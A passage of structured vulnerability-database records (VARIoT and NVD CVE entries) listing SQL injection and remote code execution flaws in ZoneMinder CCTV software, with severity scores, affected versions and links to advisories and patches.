"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2023-26032",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26032"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"id": "VAR-202302-2186",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T19:49:02.561000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=228058"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-6c72-q9mw-mwx9"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26032"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-26032/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26032"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26032"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26032"
},
{
"date": "2023-11-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"date": "2023-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"date": "2023-02-25T01:15:56.760000",
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26032"
},
{
"date": "2023-11-01T02:03:00",
"db": "JVNDB",
"id": "JVNDB-2023-004652"
},
{
"date": "2023-03-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2022"
},
{
"date": "2023-11-07T04:09:17.300000",
"db": "NVD",
"id": "CVE-2023-26032"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004652"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2022"
}
],
"trust": 0.6
}
}
VAR-202302-1868
Vulnerability from variot - Updated: 2025-01-30 19:43ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an SQL Injection. The minTime and maxTime request parameters are not properly validated and could be used execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202302-1868",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.00"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.00 that\u0027s all 1.37.33"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"cve": "CVE-2023-26037",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2023-26037",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "LOW",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2023-26037",
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-26037",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-26037",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-26037",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-26037",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202302-2016",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an SQL Injection. The minTime and maxTime request parameters are not properly validated and could be used execute arbitrary SQL. This issue is fixed in versions 1.36.33 and 1.37.33. ZoneMinder for, SQL There is an injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-26037"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "VULMON",
"id": "CVE-2023-26037"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-26037",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004647",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2016",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2023-26037",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26037"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"id": "VAR-202302-1868",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T19:43:14.379000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=228054"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-65jp-2hj3-3733"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-26037"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-26037/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26037"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2023-26037"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26037"
},
{
"date": "2023-11-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"date": "2023-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"date": "2023-02-25T02:15:13.770000",
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-02-26T00:00:00",
"db": "VULMON",
"id": "CVE-2023-26037"
},
{
"date": "2023-11-01T01:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-004647"
},
{
"date": "2023-03-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202302-2016"
},
{
"date": "2023-03-07T16:52:10.330000",
"db": "NVD",
"id": "CVE-2023-26037"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004647"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202302-2016"
}
],
"trust": 0.6
}
}
CVE-2024-51482 (GCVE-0-2024-51482)
Vulnerability from nvd – Published: 2024-10-31 18:07 – Updated: 2024-11-08 16:49
VLAI?
Title
Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Severity ?
10 (Critical)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
>= 1.37.0, < 1.37.65
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThanOrEqual": "1.37.64",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-51482",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-31T19:38:43.424341Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T16:49:08.199Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.65"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* \u003c= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T13:41:25.010Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/9e7d31841ed9678a7dd06869037686fc9925e59f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/9e7d31841ed9678a7dd06869037686fc9925e59f"
}
],
"source": {
"advisory": "GHSA-qm8h-3xvf-m7j3",
"discovery": "UNKNOWN"
},
"title": "Boolean-based SQL Injection in ZoneMinder v1.37.* \u003c= 1.37.64"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-51482",
"datePublished": "2024-10-31T18:07:25.310Z",
"dateReserved": "2024-10-28T14:20:59.335Z",
"dateUpdated": "2024-11-08T16:49:08.199Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-31493 (GCVE-0-2023-31493)
Vulnerability from nvd – Published: 2024-10-15 00:00 – Updated: 2024-10-16 18:56
VLAI?
Summary
RCE (Remote Code Execution) exists in ZoneMinder through 1.36.33 as an attacker can create a new .php log file in language folder, while executing a crafted payload and escalate privileges allowing execution of any commands on the remote system.
Severity ?
6.6 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThanOrEqual": "1.36.33",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-31493",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-16T18:53:24.875640Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-16T18:56:57.965Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "RCE (Remote Code Execution) exists in ZoneMinder through 1.36.33 as an attacker can create a new .php log file in language folder, while executing a crafted payload and escalate privileges allowing execution of any commands on the remote system."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-15T14:53:42.080869",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "http://zoneminder.com"
},
{
"url": "https://medium.com/%40dk50u1/rce-remote-code-execution-in-zoneminder-up-to-1-36-33-0686f5bcd370"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-31493",
"datePublished": "2024-10-15T00:00:00",
"dateReserved": "2023-04-29T00:00:00",
"dateUpdated": "2024-10-16T18:56:57.965Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43360 (GCVE-0-2024-43360)
Vulnerability from nvd – Published: 2024-08-12 20:55 – Updated: 2024-08-15 19:00
VLAI?
Title
ZoneMinder Time-based SQL Injection
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
9.8 (Critical)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"status": "affected",
"version": "\\u003c.1.36.34"
},
{
"lessThanOrEqual": "1.37.61",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43360",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T18:53:18.459320Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:00:59.189Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:55:14.760Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6"
},
{
